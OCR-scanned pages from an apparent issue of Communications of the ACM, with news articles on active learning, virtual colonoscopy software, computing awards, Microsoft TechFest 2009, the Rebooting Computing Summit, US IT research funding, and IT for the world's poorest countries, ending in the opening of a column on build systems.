year, however, Maria-Florina Balcan, 
Alina Beygelzimer, and John Langford 
published a paper, “Agnostic Active 


| Learning,” which described the first 
_ active learning algorithm that could 


work with noise but still provided im- 
provement over passive learning. The 


| algorithm, A’, labeled examples from 
| a region of disagreement at random, 


eliminating certain hypotheses until 
a pattern emerged that was as close as 
possible to a true understanding. 

One of the major improvements of 
A’ was finding a threshold function. 
With passive learning, every piece of 
data must be analyzed between two 
bounds before the threshold can be 
reliably established. With active learn- 
ing, however, the algorithm can nar- 
row down the threshold value in an 
almost binary search, resulting in ex- 
ponentially fewer labels. 

Additional research by Hanneke 
demonstrated that the algorithm per- 
formed well as long as the samples in 
the region of disagreement weren’t 
too diverse and didn’t differ in too 
many ways. Also, further refinements 
addressed the sampling bias created 


| by labeling only the most informative 


examples. In essence, the labeled ex- 


' amples were not being chosen at ran- 


Computer Science Awards 


The National Academy of 
Engineers was among several 
professional societies that 
recently honored a select 


systems and their applications. 


NAE MEMBERS 
The National Academy of 


Technology; 


Artificial Intelligence Labora- 
tory, Massachusetts Institute of 


> Deborah L. Estrin, director, 


SLOAN RESEARCH FELLOWS 
_ The Alfred P. Sloan Foundation 
| awarded two-year fellowships 


to 118 researchers, including 


group of researchers for their 
distinguished contributions to the 
field of computer science. 


2009 EATCS AWARD 

The European Association for 
Theoretical Computer Science 
(EATCS) honored Gérard Huet, 
director of research at the French 
National Institute for Research in 
Computer Science and Control, 
with the 2009 EATCS award, in 
recognition of his distinguished 
career in theoretical computer 
science. 


TSUTOMU KANAI AWARD 
Willy Zwaenepoel, a professor 
of computer 
science and 
director of 
the Computer 
Systems 
Laboratory at 
Rice University, 
won the IEEE 

. Computer 
Society Tsutomu Kanai Award for 
major contributions to state-of- 
the-art distributed computing 
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Engineering elected 65 new 


| members and nine foreign 


associates for outstanding 
contributions to “engineering 
research, practice, or education, 
including, where appropriate, 


| significant contributions to the 


engineering literature,” and 

to the “pioneering of new and 
developing fields of technology, 
making major advancements in 
traditional fields of engineering, 


| or developing/implementing 


innovative approaches to 
engineering education.” 
Fourteen computer scientists 
are among the new members and 
foreign associates. They are: 
> Paul M. Anderson, consultant, 
Power Math Associates; 
> Sergey Brin, co-founder and 
president of technology, Google; 
> William J. Dally, William R. 
and Inez Kerr Bell Professor of 
Computer Science, Stanford 
University; 
> Jeffrey Dean, Google Fellow, 


| Google; 


> Jack B. Dennis, professor 
emeritus, Computer Science and 
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| >» William L. “Red” Whittaker, 


Center for Embedded Networked 
Sensing, University of California, 
Los Angeles; 

> Sanjay Ghemawat, Google Fel- 
low, Google; 

> Paul C. Kocher, founder, 
president, and chief scientist, 
Cryptography Research Inc.; 

> C. Mohan, IBM Fellow, IBM 
Almaden Research Center; 

> Mendel Rosenblum, associate 
professor of computer science 
and of electrical engineering, 
Stanford University; 

> Gurindar S. Sohi, John P. 
Morgridge Professor and E. David 
Cronon Professor of Computer 
Sciences, departments of com- 
puter sciences and electrical and 
computer engineering, University 
of Wisconsin, Madison; 

> John A. Swanson, president, 
Swanson Analysis Services Inc.; 


Fredkin Professor of Robotics, 
The Robotics Institute, Carnegie 
Mellon University; 

> Peter T. Kirstein, professor, 
department of computer science, 
University College London. | 


16 computer scientists, “in 
recognition of distinguished 
performance and a unique 
potential to make substantial 
contributions to their field.” 
The computer scientists 
are: Scott Aaronson, MIT; 
Luis von Ahn, Carnegie Mellon 
University; Shuchi Chawla, 
University of Wisconsin, 
Madison; Kevin Fu, U. of 
Massachusetts—Amherst; 
Odest Chadwicke Jenkins, 
Brown University; David 
Kempe, University of Southern 
California; James Russell Lee, 
University of Washington; 
Zhuogqing Morley Mao, 
University of Michigan; Kamesh 
Munagala, Duke University; Tze 


| Sing Eugene Ng, Rice University; 


Ryan William O’Donnell, 
Carnegie Mellon University; 
Fabio Pellacini, Dartmouth 
College; Ramesh Raskar, MIT; 
Alex C. Snoeren, University of 
California, San Diego; René 
Vidal, Johns Hopkins University; 
and Steve Zdancewic, University 
of Pennsylvania. 
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NEWS 


Learning More 
About Active Learning 


Active learning algorithms are pro 


ducing substantial savings 


in label complexity over passive learning approaches. 


F YOUR EMAIL address has ever | 


landed on a spammer’s list, 
you know what it’s like for your 
inbox to be flooded with junk 
email day after day after day. To 
prevent this, spam filters were created, 
relying on a mixture of brute force 
computing with passive learning and 
refined processing with active learn- 
ing. And while spam filters have be- 
come more sophisticated and your in- 
box is increasingly free of junk email, 
the theory behind active learning has 
lagged. In the last few years, however, 
the field has taken off. 

“There’s been surprisingly rapid 
progress,” says Steve Hanneke, a Ph.D. 
student at Carnegie Mellon Univer- 
sity. “If you look back five years, there 
was really very little known about what 
makes something an informative ex- 


ample, how important are they, and | 


how much improvement we can ex- 
pect. But we now have in the published 
literature a pretty clear picture of just 
how much improvement we can expect 
in active learning and what we mean by 
an informative example.” 

The difference between passive 
learning and active learning is about 
the teacher, and how much time the 
teacher wants to spend teaching. Pas- 


sive learning requires large data sets, 
and the teacher has to label countless 
examples for the learner. Once ev- 
ery example is labeled, the data set is 
given to the learner, which then finds 
patterns that will allow it to sort future 
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data correctly. 

The obvious drawback is that pas- 
sive learning requires a lot of time, and 
that’s where active learning enters the 
picture. 

In active learning, all of the exam- 
ples are provided to the learner unla- 
beled. An algorithm analyses the unla- 
beled data set, and asks the teacher for 
labels. After the algorithm determines 
the basic shape of each label set, itasks 
the teacher to define the ambiguous ex- 
amples in-between the various labels. 
By labeling only the most informative 
examples, the hope is that fewer labels 


Su Pa , 


At Carnegie Mellon, Steve Hanneke’s new work has the benefit of using established passive learn- 
ing, alongside active learning with its guaranteed improvements, on the number of labels needed. 
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is being addressed in a technique 
called low dose, which Kaufman’s 
group is researching, with a grant 
from the National Institutes of Health 
(NIH). Another drawback of a virtual 
colonoscopy is it can’t remove polyps; 
patients still need an optical colonos- 
copy for their surgical excision. How- 
ever, a virtual colonoscopy study has 
shown that only about 7% of patients 
required such follow-up. 

Insurers, however, have been slow 
to catch on. Medicare, for example, 
announced a tentative decision ear- 
lier this year to not pay for virtual 
colonoscopies. And some insurers 
have setup the payment codes that 
healthcare providers need to be re- 
imbursed for the procedure, but the 
money has yet to materialize. How- 
ever, Kaufman says the political will 
to mandate coverage is growing, and 
patients can pressure their insurer to 
pay for a virtual colonoscopy by refus- 
ing to undergo optical colonoscopy. 


Early Detection 

Screening is critical because a pa- 
tient’s successful outcome often 
hinges on the early detection of pol- 
yps. A virtual colonoscopy removes 
many of the uncomfortable hurdles. 
“Only 15%-19% of individuals eligible 
for screening currently undergo colon 
evaluation,” says Hiroyuki Yoshida, an 
associate professor at Harvard Medi- 
cal School and director of 3D Imaging 
Research at Massachusetts General 
Hospital. “The cathartic cleansing 
required for bowel preparation is the 
biggest barrier.” 

A virtual colonoscopy still re- 
quires preparation, so developing a 
laxative-free procedure will be indis- 
pensable to its practicality, Yoshida 


says. One hitch: eliminating laxa- | 


tives leaves more fecal matter in the 
colon, which requires improvements 
inelectronic cleansing. What’s more, 
patients still must ingest an oral 
contrast agent, such as barium or io- 
dine, and air or carbon dioxide must 
still be used to distend the colon. 
Yet, a laxative-free virtual colonos- 
copy could be ready for public use in 
the near future, Yoshida says. 
Many of the challenging issues with 
virtual colonoscopies involve software 
applications. Computer-aided detec- 
tion (CAD), the focus of Yoshida’s re- 


Virtual colonoscopies 
could become 

more available 

in remote places 

via telemedicine. 


search, brings much-needed automa- 
tion to electronic cleansing and polyp 
detection. It holds great promise, 
says Kaufman. “In mammography, 
this has been entirely successful,” he 
notes. “Basically, the computer is an- 
other set of eyes.” 

Skill in interpreting diagnostic im- 
ages varies among radiologists, who 
can mistake the colon’s normal valves 
and folds for polyps. Yoshida says 
CAD could make results more objec- 
tive and consistent, and shorten radi- 
ologists’ learning curve. It could also 
be useful in hospitals that lack exper- 
tise with virtual colonoscopies. 

However, CAD presents its own 
challenges. “Sometimes CAD’s weak 
spots are comparable to human view- 
ers’ weak spots,” says Dr. Ronald 
Summers, a radiologist and senior 
investigator at NIH. One important 
challenge is detecting flat lesions, 


| which are more difficult to detect with 


a virtual or optical colonoscopy, but 
constitute a higher risk for cancer. 
Kaufman has co-developed a novel 
CAD technique, utilizing colon flat- 
tening and volume rendering, which 
has achieved perfect sensitivity and 
tolerable specificity, and could func- 
tion as either a first or second reader. 
Another problem is false positives: 
they require patients to undergo an 
optical colonoscopy. Of course, false 
positives aren’t as deadly as false neg- 
atives, and doctors can dismiss false 
positives with a second read. Ide- 


| ally, Kaufman says, CAD should be a 


first reader for radiologists, who can 
inspect the regions flagged by it. “I 
think the second read is the one the 
radiologist should use, because it has 
the highest sensitivity, but we’re still 
working that out,” Dr. Summers says. 

There is also considerable debate 
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Technology 


TechFest 
2009 


Microsoft Research unveiled 
more than 100 innovations at 


_ its annual TechFest showcase 


in late February in Redmond, 
WA. Among the emerging 
technologies projects were: 


SECONDLIGHT 

Used with Microsoft Surface, 
SecondLight can project images 
and detect gestures in mid-air 
above Surface’s display (in 
addition to supporting its 
multitouch capabilities). The 
magic behind SecondLight 
involves Surface’s LCD screen 
that can switch between opaque 
and translucent, alternating 

60 times per second. A pair of 


_ recessed projectors alternate 


flickering 30 times per second, 
with one projector timed to 


_ illuminate the screen when 


it is opaque and the second 
projector timed to illuminate 
when it is transparent. When 
the screen is transparent, any 
object held above the screen will 


| reveal what is being output by 


the second projector. 


RENLIFANG 

When you conduct a Web search 
for information about a specific 
person—say, an ex-girlfriend— 
you still need to examine all 

of the search results and piece 
together the information 
before being able to ascertain 
the parameters of her social 
universe. Renlifang is a Web 
entity-summarization system 
that automatically creates a 
biography page of the person; 

a social-network graph for the 
person; a shortest relationship 


__ path between the person and 


someone else; titles for the 
person found on the Web; and 
all of the structured information 
that Microsoft possesses on the 
person in its local database. 


REAL-TIME STITCHING OF 
MOBILE-GENERATED VIDEOS 
Microsoft demonstrated a real- 


_ time video-stitching system from 


multiple mobile phones that 
produces a wide field-of-view 
experience with high resolution. 


| Possible applications include 


citizen journalism; virtual 
attendance of family events and 
gatherings; and emergencies 

in which citizens provide a 
real-time video feed for first 
responders before they reach the 
scene of the emergency. 
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on how to best combine 2D and 3D 


imagery. “We seem to be moving to | 


| “The examination 


a consensus that the sensitivity and 
specificity of 2D and 3D are compa- 


rable,” Dr. Summers says. “The ques- | 


tion is which one do you use as your 
primary.” Yoshida thinks CAD could 
soon replace 3D visual fly-throughs 
for first reads, though expert exami- 
nation of 2D images—what radiolo- 
gists called “problem solving”—will 
still be needed. 

2D is important in a virtual biopsy, 
which depends on flattening the im- 
ages to simulate what pathologists 
do when dissecting a polyp. “They 
will slice it along its length and lay it 
flat and look at it,” Dr. Summers says. 
“You do the same thing on the com- 
puter.” Some experts, he notes, think 
such 2D dissection provides faster di- 
agnosing than 3D fly-through. 


Seeking Improvements 
Medical and computer-science re- 
searchers are striving to make virtual 


colonoscopy technology more accu- | 


rate, affordable, easier to use, and pa- 
tient friendly. 

A technique called dual-energy im- 
aging, for instance, highlights polyps 
by blending images derived from dif- 
ferent radiation doses to increase 


is done on the data, 
rather than the 
patient,” says Dr. C. 
Daniel Johnson. 


contrast, Yoshida says. And graph- 
ics processing unit-based rendering 
is being touted as a faster method 
of getting images to radiologists, as 
Kaufman’s group has done. Also, Dr. 
Summers says his collaborators and 
him have figured out how to bolster 
CAD with wavelets on manifolds to re- 


duce false positives by more precisely | 


characterizing polyps. And machine 
learning and neural nets are the sub- 
ject of ongoing research. 

To increase virtual colonoscopies’ 
usability, computer scientists are also 


focusing attention on the PCs that are | 


used for analyzing images. One possi- 
bility is off-site image processing, which 
Yoshida says Massachusetts General 
Hospital is ready to implement. 


Others hope to democratize virtual 
colonoscopies by getting the software 
to run effectively on desktop and lap- 
top computers. For example, the Red- 
mond, WA, company FiatLux Imaging 
employs the Direct3D technology in 
video games and in virtual colonosco- 
pies. “It’s usually required to run on 


| very heavy-duty, expensive hardware,” 


says Rosemary Fisher, FiatLux’s clini- 
cal application specialist. “That is 
prohibitively expensive for small 


| hospitals and clinics.” Many of them 


lack colonography software and have 
little financial incentive to invest in 
it before insurers start uniformly re- 
imbursing for virtual colonoscopies. 
But as spiral CT scanners become 
more broadly distributed, affordable 
volume-rendering software, such as 
FiatLux’s Visualize, might make vir- 
tual colonoscopies more available in 
remote places via telemedicine. 

The takeaway message is that vir- 
tual colonoscopies are poised to dra- 
matically increase successful colon 
screening outcomes. Says Kaufman, 
“We're going to save 50,000 lives every 
year just in the U.S.” 


David Essex is a freelance science writer based in 
Peterborough, NH 
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Computer Graphics 


Catmull Wins Second Oscar 


ACM Fellow Ed Catmull, a 
computer scientist, co-founder 


possible—for filmmakers and 
movie audiences around the 


Catmull founded the computer 
| graphics laboratory at the New 


of Pixar Animation Studios, and 
president of Walt Disney and 
Pixar Animation Studios, received 
the Gordon E. Sawyer Award from 
the Academy of Motion Picture 
Arts and Sciences in recognition 
of his lifetime of technical 
contributions and leadership in 
the field of computer graphics 
for the motion-picture industry. 
Catmull was presented with 

an Oscar statuette at the 
Scientific and Technical Awards 
Presentations last February at the 
Beverly Wilshire Hotel. 

“Ed is one of the rare 
individuals who can bridge the 
space between science and art,” 
said Academy President Sid 
Ganis. “His vision, ingenuity, 
and groundbreaking designs 
have made the impossible 
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world.” 

Catmull, who delivered a 
keynote address at SIGGRAPH 
2008, has described ACM 


| SIGGRAPH as his “home 


community.” He is regarded as 


| an innovator by the community 


for his key contributions to 
fundamental computer graphics 
concepts like z-buffer and sub- 
division surfaces, and has held 
several leadership positions in 
SIGGRAPH over three decades. 
In 1995, Catmull became an 
ACM Fellow, and was cited 

for “his many and noteworthy 
advances in computer graphics 
as an individual researcher, as an 
inspiring leader in the field, as a 
director of organizations, and as 


| amentor for many.” 


In the course of his career, 
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_ York Institute of Technology as 
well as the computer division 

| of Lucasfilm Ltd., and Pixar 
Animation Studios. 

In 2000, Catmull and his 
team received an Oscar for an 
Academy Award of Merit for 
_ their significant advancements 
to the field of motion picture 
rendering as illustrated 
in Pixar’s RenderMan. He 
| previously received two Scientific 
and Engineering Awards from 
| the Academy. In 1992, he was 
part of a team recognized for 
the development of RenderMan 
software. In 1995, he was ona 
team honored for pioneering 
inventions in Digital Image 
Compositing. He also shared a 
| Technical Achievement Award 
| from the Academy in 2005. 
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News 


Time to Reboot 


A diverse, international group of more than 200 attendees met at the Rebooting 
Computing Summit to address the problems confronting computer science. 


HE CHALLENGES FACING the 
computing field are well 
known: enrollment in de- 


gree programs has steadily | 


declined since 2001; women 


and minorities are underrepresented; |! 


many K-12 students have a negative 
perception of computing; and reports 
say the innovation rate in the field has 
decreased. 


To address these formidable chal- | 


lenges, a group of more than 200 par- 
ticipants from many sectors touched 
by computing, including business, 
education, government, engineering, 
and science, held a three-day Rebooting 


Computing Summit at the Computer | 


History Museum in Mountain View, CA, 
last January. 

The meeting comes at a critical 
time for the computing field, says Peter 
Denning, chairman of the computer 
science department at the Naval Post- 
graduate School in Monterey, CA, and 
organizer of the invitational summit. 

“According to the last figures I saw, 
the total number of computer science 
students in the pipeline and expected 
to graduate is about two-thirds of the 
number of jobs needing to be filled,” 
Denning says. “These are rewarding 
jobs, demanding creativity.” 

In addition to the inadequate num- 
ber of computer science students, 
another disturbing reality is that key 
meetings of the leaders in science don’t 
regularly include computer scientists. 
“Computer science is often not at the 
table,” Denning says, “and that hurts 
science badly.” 

Denningandalike-minded 18-mem- 
ber team decided that previous work- 
shops and studies devoted to these is- 
sues hadn’t produced enough impact. 
It was time to try something different, 
so they invited a diverse, international 
group representing all major sectors 
of computing to meet, share ideas and 
find common ground, and take action. 

Attendees say the summit succeed- 


ed in generating excitement in a com- | 


Conference organizer Peter Denning, left, and facilitator Ron Fry prepare before the start of 
the Rebooting Computing Summit, which was held at the Computer History Museum. 


munity that’s been frustrated in its 
efforts to attract young people and col- 
laborators, and report that they’re ea- 
ger to continue the momentum started 
at the event. 

“The most exciting part of the meet- 
ing was getting together with people 
who all share a passion for computer 
science anda common goal of working 


| to help revitalize the field,” says Robb 
Cutler, past president of the Comput- | 
| tools such as blogs, social networks, 


er Science Teachers Association. The 
summit fostered connections among 


people with an interest in K-12 com- | 


puter science programs, Cutler says. 
Tim Bell, associate professor at the 
University of Canterbury in New Zea- 


land, says the summit brought together | 


many people in an environment that 
seeded a lot of cooperation. “Not only 
did I meet people interested in the same 


| kind of project, but there was the energy 


and impetus to do something coopera- 
tive on a global scale,” Bell says. 

The summit’s main achievement 
was the formation of 15 action groups 
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that will carry out projects in the com- 
ing year. These groups include Image 
of Computing, Defining Computer Sci- 
ence, and K-8 FUNdamentals. Each 
group created a mission statement and 
a list of actions they plan to accomplish 
during the next year. 

The Rebooting Computing Web 
site, rebootingcomputing.org, lists the 
groups, members, and contact infor- 
mation, and incorporates collaborative 


and wikis. Denning is encouraged by 
activity he’s seen since the summit, 
such as the appearance online of sev- 
eral videos about the conference. 

“The loss of attraction to [computing] 
comes from our being unable to commu- 
nicate the magic and beauty of the field,” 
Denning says. “We need to create an 
appreciation for the elegance and pow- 
er of what computing can do.” iC 


Bob Violino is a writer based in Massapequa Park, NY, 
who covers business and technology. 
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IT Ecosystem in Peril 


Experts warn the U.S. may soon relinquish 
its leadership role in IT research and development. 


HE DEBATE IN Washington, 
D.C. over strengthening 
the nation’s infrastructure 
shouldn’t focus only on roads 


and bridges. To keep the U.S. — 


economy healthy for years to come, pol- 
icymakers must also bolster another 
vital infrastructure: the IT industry's 
research and development ecosystem. 
That’s one of the conclusions of As- 
sessing the Impacts of Changes in the In- 


formation Technology R&D Ecosystem: | 


Retaining Leadership in an Increasingly 
Global Environment, a 166-page report 
created by a National Research Coun- 
cil panel and released by the National 
Academy of Sciences in January. 

The study’s 12-member panel, con- 
sisting of IT leaders in academia, ven- 
ture capital, and industry, examined the 
threats to U.S. prominence as a world 
IT leader. “The report says the U.S. risks 
ceding IT leadership to other nations 
within a generation, and I think that’s 
absolutely true,” says Ed Lazowska, a 
committee member and Bill & Melinda 
Gates chair in computer science and en- 
gineering at the University of Washing- 
ton. “People should be seriously con- 
cerned about the entire ecosystem.” 

The response, according to the 
study, should be to build U.S. strengths 


in “conceptualizing idea-intensive 
new concepts, products, and servic- 
es.” For that it needs the “best-funded, 
most-creative” research institutions, 
world-leading technical and entrepre- 
neurial talent, and advanced technol- 
ogy infrastructures, in particular for 
next-generation wireless broadband 
communications. 

But some. specific recommenda- 
tions may be controversial during an 
economic downturn, including calls for 
additional government spending and 
increases in the number of H-1B visas 
for foreign nationals. 


| Reassess R&D Funding 


Although the report doesn’t recom- 
mend funding goals, Lazowska says the 
Obama administration should reassess 
R&D funding priorities. “We should be 
investing in research that’s going to cre- 


| ate the infrastructure we need five, 10, 


and 15 years from now,” Lazowska says. 

To do this, funding authorities 
should consider IT’s contribution to the 
economy, says Randy H. Katz, co-chair 
of the study and professor of electrical 
engineering and computer science at 


| the University of California, Berkeley. 


“Do a fair assessment of the impact of 
IT on the economy. By that [measure] 


Comparison of U.S., Japanese, and European Union estimated public funding 


of civilian information technology and communications research and development 


(in billions of dollars) 


Year United States Japan European Union 
1999 2 19 27 
2000 ie 21 29 
2001 16 2.3 3.0 
2002 As) 25 3.3 
2003 ded 2.6 che 
2004 19 2ul 3.4 
2005 18 21 35 


ee 


Source: Assessing the Impacts of Changes in the Information Technology R&D Ecosystem: Retaining 
Leadership in an Increasingly Global Environment, National Research Council, 2009 
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a lot of the growth in the U.S. domestic 
product can be attributed to productiv- 
ity growth related to the effective use of 
information technology,” he says. 

Recommendations for helping the 
nation remain a magnet for technical 
talent include strengthening comput- 
ing education, and more controversial- 
ly, expanding the number of H-1B visas 
issued to permit foreign nationals to 
study and work in the U.S. 

Some U.S. citizens believe H-1B vi- 
sas enable foreign nationals to take 
jobs from Americans and depress IT 
salaries. But the study argues for flex- 
ibility and recommends that the per- 
mits favor those with advanced degrees 
who subsequently work in the U.S. to 
create new products and companies, 
Katz explains. 

The alternative is to allow interna- 
tional students to receive U.S. tax dol- 
lars for research and education “and 
then send those students back to their 
home countries to compete against us,” 
warns Dan Reed, scalable and multicore 
computing strategist with Microsoft Re- 
search and a member of the study’s re- 
view committee. 

Finally, to fuel the economy’s ability 
to encourage new companies, policy- 
makers should reduce the “friction” 


| caused by regulations such as the Bayh- 


Dole Act, which governs university intel- 
lectual property issues. “What’s a mod- 
est burden for a major multinational 
can bea huge legal or regulatory burden 
for four guys in a garage,” Reed says. 
Katz calls entrepreneurs and venture 
capitalists “a very important and under- 


_ examined dimension” for IT R&D. “The 


takeaway I’d want for Congress is that 
one size does not necessarily fit all,” 
Katz says. “Having some understanding 
[of this] is important in the way that they 
draft that legislation.” iC 


Alan Joch is a business and technology writer based in 
Francestown, NH. 
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Emerging Markets 
IT and the World’s 
“Bottom Billion” 


How can information technology be best applied to address problems 
and provide opportunities for inhabitants of the world’s poorest countries? 


HILE CELEBRATING 


Asia, India, and Latin 


thought for the world’s 
“bottom billion.” These are the inhab- 
itants of the Fourth World that sits be- 
neath the Third World; dozens of coun- 


tries that, in the words of economist | 


Paul Collier “are falling behind, and 
often falling apart.”” 


As informatics professionals, why | 


should we care about these countries? And 
how might IT best be used to help them? 
The bottom billion—a population 
equivalent to that of the U.S. and Eu- 
rope combined—lives overwhelmingly 
in sub-Saharan Africa or Central Asia. 
Life expectancy in these regions is just 
50 years. One-in-seven children die be- 
fore the age of five. They missed the glo- 
balization boat that sailed with many 
other developing countries in the 1980s 
and 1990s. While those other countries 
have grown steadily richer, the Fourth 
World of the bottom billion was actu- 
ally poorer in 2000 than it was in 1970.” 
These countries are not emerging mar- 
kets, they are fading markets: the whole 
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THE | 
emerging markets of | 


America, let’s spare a | 


of sub-Saharan Africa has an economy 
the size of Belgium’s. 

Should we be concerned? 

Simple ethics says we should: devel- 
| oping an e-business solution to squeeze 
out a few extra ounces of profit or time- 
saving for the world’s privileged popu- 
_ lation living in the global North pales 
in ethical importance compared to 
applying new technology to the mega- 
problems of the bottom billion. And 


Se. 
| These countries are 
not emerging markets, 
they are fading 
markets: the whole of 
sub-Saharan Africa 
has an economy the 
size of Belgium’s. 


self-interest says we should: the bot- 
tom billion—countries like Somalia, 
Afghanistan, and North Korea—are key 
sources of global instability and risk in- 
cluding drugs, piracy, and terror. 

Not surprisingly, the bottom-billion 
nations have been among the least digi- 
tal. But that is changing. Official figures 
may indicate an average of only three 
Internet users per hundred popula- 
tion® but that greatly underestimates 
the true reach. Information technology 
in the Fourth World is acommunal, not 
individual, resource. As a result, many 
times more are casual users; and many 
times more again have indirect access 
to Internet-based data and applications 
through friends and relations. Internet 
connectivity is also growing fast: by 42% 
per annum in the bottom billion, com- 
pared to 18% in Europe. 

Beyond the Internet, there is an even 
greater bottom-billion phenomenon: 
the cellphone. Ten years ago, Man- 
hattan had more phone connections 
than all of Africa. Today, thanks to the 
cellphone, Africa has more phone con- 
nections than the U.S. and Canada 
combined. Approximately one-fifth of 


ILLUSTR 


bottom-billion citizens are subscribers 
(up from approximately 2% at the start 
of the century)* but, as with the Internet, 


the effective penetration—those who | 


could access a cellphone from neigh- 
bors, relatives, or local call sellers if nec- 
essary—is higher; likely more than half 
the population. 


high—50% per year compared to less 
than 20% in Europe—and sometimes 
highest for the most-afflicted countries. 
Three examples of the worst of insecuri- 
ty and instability in the bottom billion— 
Afghanistan, Democratic Republic of 
the Congo, and Somalia—have high 
investments and an average 100% an- 
nual growth rate.’ Those rates are likely 
to sustain: in sub-Saharan Africa, for 


example, by 2012, it is estimated 90% of | 


the population will be within cellphone 
coverage, up from 60% today.’ 

We are still a long way from North 
American rates of IT usage but it is well 
past time to move from talking about 
vague future possibilities and begin 
talking about actual current priorities. 

The first priority should be engage- 
ment. I wonder how many Communi- 


cations readers are working on an in- 
formatics project in a bottom-billion 
country. It is likely not a large number, 
because we tend to work where the 
money is rather than where the prob- 
lems are. 

In terms of IT, the three key priori- 


| ties are mobiles, mobiles, and mobiles. 
Subscriber growth rates are also | 


As indicated earlier in this column, 
cellphones are now reaching far down 
into the bottom billion. At present, de- 


velopment solutions will need to be | 


based around voice and text. But other 
possibilities are rapidly opening up. 
One set of these possible solutions 
involves the integration of mobiles 
with other IT. This scenario could in- 
volve radio and television, converting 
these high-penetration but broadcast- 
only media into much more interactive 
forms, as currently being achieved in 
the growing number of “community 
radio” projects. Or we can think of in- 


| tegrating phones with telecenters and 


kiosks. Pilot projects already under way 
suggest this can multiply the impact of 


| Web access many times." 


How will the Web and Internet reach 
the bottom billion? The GSM Associa- 
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tion estimates that 80% of Internet deliv- 
ery will occur through mobile devices.’ 
However, mobiles are not the only way 
forward. WiMAX-plus-netbook systems 
can offer high-quality, low-cost Internet 
access. Even more intriguing is the po- 
tential use of “white space”: the unused 
parts of the analog television broadcast 
spectrum. For the bottom billion, it will 
be many years before digital switchover 
and release of analog spectrum space, 
but new technology could be developed 
to identify and use existing white space 
spectrum gaps.' This reallocation of 
spectrum space could offer wide-reach- 
ing broadband Internet service at a frac- 
tion of the cost of other solutions. 

In all these areas, though, we need 
more, better, and less expensive tech- 
nological innovations that focus on the 
particular conditions and resource con- 
straints of bottom-billion customers. 

Beyond hardware and software, what 
application priorities do the bottom bil- 
lion demand? 

Analysis of the problems of the 
Fourth World may help provide an an- 
swer. The key problem is that of exclu- 
sion: the average bottom-billion citizen 
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lives a life that is more 14" century than 
21* century because their countries 
have been excluded from the benefits of 
globalization and because, within their 
countries, these citizens are excluded 
from the services, opportunities, and re- 
sources that we in the global North take 
for granted. 

Social exclusion has prevented the 
bottom billion from accessing basics 
like health care, education, and govern- 
ment services. Many of these functions 
are information-based or information- 
enabled. IT therefore has a central role 


to play. For example, it can disinterme- 
diate the sometimes-corrupt gatekeep- | 


ers who stand between poor citizens 
and the meeting of their social develop- 
ment needs. 

Political exclusion has helped perpet- 
uate bad governance in bottom-billion 
countries. Our Western mentalities have 
tended to simplistically condense the 
solution into elections. But Paul Collier 
argues these have been the least effec- 
tive part of the governance fixes for the 
most-troubled nations. Instead, he says, 
we should be seeking greater transpar- 
ency: helping citizens hold their govern- 
ments to account. 

Transparency is all about informa- 
tion flows, so IT is crucial, and we al- 
ready have some pointers about new 
ways in which it can be used. In West Af- 
rica, the notion of government surveil- 
lance has been turned on its head to cre- 


ate citizen “sousveillance”: monitoring | 


democratic processes and reporting on 
them using short message service and 
taking cellphone pictures as evidence. 

In East Africa, open information sys- 
tems are being used to publicize how 
much government spending should be 
getting through to the “front line” of 
development. Combined with citizen 
report-back, in one case this raised the 
amount reaching schools from 20% of 
allocation to 90%.* 

And IT is integral to a new form of 
openness and engagement: e-participa- 
tory budgeting, which provides online 
citizen discussion and decision making 
on how part of the government budget 
will be spent. Projects so far find thou- 
sands of people participating, and many 
more involved via friends and other IT- 
savvy intermediaries. 

Perhaps most important of all is eco- 
nomic exclusion. It should be axiomatic 
that the main difference between the 
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We tend to assume 
that IT has little 
or no role in these 


| countries. In fact it 


does already and 


| will in the future have 


much to offer. 


world’s poorest and everyone else is... 
they have less money. We need to en- 
sure, in harnessing IT for the bottom 


billion, that a strong priority is given to 


applications that help create wealth. To 
do this, IT must address the exclusion 
of poor individuals and poor nations 
from markets. 


IT can generate new market opportu- | 
nities. Flying somewhat under the radar | 


of government and donor agencies, IT 
can help directly create new microenter- 


prises for the poor. Ongoing research at — 


the University of Manchester suggests 
this is one of the fastest-growing sectors 
in the bottom billion: it involves those 
who set up their own Internet kiosks, 


those who stand on street corners sell- | 


ing cellphone calls, those who sell pre- 
paid cellphone cards and phone covers, 
and many other business ideas. 

IT can offer access to new sources 
of finance. Organizations like Kiva use 
Web microfinance portals to make a 
direct link between individual sponsors 
in the global North, and microentrepre- 
neurs in the bottom billion. In a less 
organized way, individuals in poor com- 
munities are turning their cellphones 
into mobile wallets. Relatives overseas 
remit money in the form of airtime. 
This arrangement is increasingly ac- 
cepted by storeowners, colleges, health 
centers, and other organizations as an 
alternative form of currency. 

And IT can improve opportunities 
for trade. By offering access to prices 
in different consumer markets, IT can 
increase incomes for the poor. We now 
have evidence indicating that the more 
remote the farmer or microentrepre- 
neur, the greater the benefit of IT.* As 


the IT base diffuses into the bottom bil- | 
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| lion, it also offers the prospect of digital 


trade; something especially valuable 
given that these nations are dispropor- 
tionately landlocked. One small but 
quickly growing element of this is “IT 
social outsourcing”: the offshoring of IT 
services work like digitization and data 
entry with a combined commercial and 
developmental intent. Evidence from 
initial projects suggests this can furnish 
not just new incomes but new skills and 
confidence to those involved.’ 

Perhaps I can best summarize all 
this by pointing to the psychological 
exclusion that we in the global North 
sometimes practice. We tend to exclude 
the bottom-billion countries from our 
worldviews and from our informatics 
work. We tend to assume that IT has lit- 
tle or no role in these countries. In fact it 
does already and will in the future have 
much to offer. We also tend to conceive 
of the bottom-billion citizens as non-us- 
ers. In fact they are not only increasingly 
active users but they are in some sense 
innovators; constantly developing new 
applications and new business models 
with the technology but also looking for 
ideas and support from global partners 
like us. 
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System Changes 
and Side Effects 


Comparing the potential benefits of system changes that help 
and the detriments of changes made for the sake of change. 


Dear KV, 

I maintain a legacy system at work that 
uses Makefiles for building the code. 
Recently my company switched to a dif- 
ferent system—SCons—for doing soft- 
ware builds and now I’m being asked 
to update our legacy code to build with 
this system. Personally, I don’t see that 
we will get any benefit switching a leg- 
acy system’s build strategy, but it’s an 
order from management so I will likely 
have no choice. Why would anyone 
bother to switch a working build sys- 
tem to a newer one? Are build systems 
really that different? Is there really any 
innovation here that could matter? 

All Built Up 
Dear Built Up, 
Innovation, as someone should have 
said, is in the eye, or perhaps hands, 
of the beholder. KV rarely condones 
change for its own sake: the change has 
to have some appreciable benefit to 
those who are working with the system. 
As this relates to build systems, there 
are few things more important to a pro- 
grammer’s work flowand therefore pro- 
ductivity than how their system is built. 
A poorly implemented build system will 
impede progress and lead to wasteful 
